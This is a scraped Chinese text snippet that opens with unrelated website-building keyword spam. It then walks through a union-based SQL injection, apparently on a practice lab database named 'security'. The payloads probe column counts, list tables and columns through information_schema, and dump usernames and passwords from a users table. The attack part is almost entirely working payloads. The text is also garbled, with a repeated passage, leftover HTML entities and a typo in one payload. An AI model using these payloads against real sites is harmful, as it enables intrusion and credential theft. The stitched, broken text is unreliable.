电子商务网站功能,一般网站建设公司好,成都网站建设招聘,申请商标官网输入?id1 得到登录页面#xff1a; 通过order by 函数试探#xff1a; 5的时候报错
试探到3 的时候返回正确的值#xff1a; 然后继续注入#xff1a;?id -1 union select 1,2,3 -- 查看回显点#xff1a; 开始查看数据库内容#xff1a;id-1 union select 1,databa…
输入?id1 得到登录页面 通过order by 函数试探 5的时候报错
试探到3 的时候返回正确的值 然后继续注入?id -1 union select 1,2,3 -- 查看回显点 开始查看数据库内容id-1 union select 1,database(),3 --
得到当前数据库是security 查询数据库里面的表内容
id-1%27%20union%20select%201,2,group_concat(table_name) from information_schema.tables where table_schemadatabase()%20-- 查询表里面的列名
?id-1 union%20select%201,2,group_concat(column_name)%20from%20information_schema.columns%20where%20table_nameusers%20-- 查询字段详细内容payload:
?-d-1 union%20select%201,2,group_concat(0x7e,username,0x5c,password,0x7e)from users %20--
